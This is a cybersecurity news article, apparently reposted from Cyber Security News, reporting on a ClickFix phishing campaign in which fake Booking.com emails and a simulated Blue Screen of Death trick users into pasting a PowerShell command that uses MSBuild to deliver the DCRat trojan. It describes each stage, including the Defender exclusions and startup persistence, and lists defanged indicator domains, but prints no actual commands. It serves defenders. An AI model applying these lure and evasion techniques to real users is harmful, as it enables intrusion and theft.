By rssfeeds-admin 
The attackers use an advanced “ClickFix” social engineering tactic that displays a fake Windows Blue Screen of Death (BSOD) to trick users into executing malicious PowerShell commands, ultimately delivering the remote access trojan DCRat.
A Multi-Stage “Living off the Land” Chain
The attack begins with phishing emails that pose as Booking.com reservation cancellation alerts, often citing inflated charges in euros to create urgency.
Victims who click the “See details” button are redirected to the spoofed site low-house[.]com via oncameraworkout [.] com/ksbo, a near-perfect clone of Booking.com.
The fake site displays a “page loading” error and a Refresh button that triggers the next stage. Once clicked, the page simulates a BSOD and prompts users to “fix” the issue by pressing Windows + R, then pasting the automatically copied script into the Run dialog.
This trick coerces users into manually executing a PowerShell command, bypassing built‑in security controls.
The hidden PowerShell command downloads an MSBuild project file (v.proj) from 2fa-bns[.]com and executes it via MSBuild.exe, a trusted Microsoft utility. This “Living‑off‑the‑Land” (LotL) technique helps the malware evade antivirus detection by blending with legitimate system activity.
Disabling Defenses and Deploying DCRat
Once executed, v.proj adds multiple exclusions to Windows Defender, including .exe, .ps1, and .proj files, then attempts privilege escalation.
If administrative rights are granted, it disables real‑time protection and downloads the payload staxs.exe via the BITS service. The malware then establishes persistence using an unusual method.Create a URL shortcut in the Startup folder to ensure it runs after every reboot.
The final payload DCRat (a Russian‑origin Remote Access Trojan) is injected into aspnet_compiler.exe to evade detection.
It uses strong AES‑256 encryption and PBKDF2 for configuration protection and connects to multiple C2 servers, including asj77[.]com, asj88[.]com, and asj99[.]com, over port 3535.
Once connected, it collects extensive system data, maintains live communication, and supports tasks such as keylogging, remote shell access, screen capture, and payload delivery, including coin miners.
Researchers at Securonix identified Cyrillic debug strings and structural similarities to AsyncRAT, linking the campaign to Russian‑speaking developers.
The evolution from earlier. HTA‑based infections to MSBuild‑driven execution mark a shift toward stealthier, more persistent operations.
Experts advise organizations to monitor PowerShell and MSBuild activities, detect suspicious .proj or .url files, and reinforce staff awareness about ClickFix‑style phishing lures.
Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.
The post New ClickFix Attack Deploys Fake Windows BSOD Screens to Deceive Users into Running Malicious Code appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.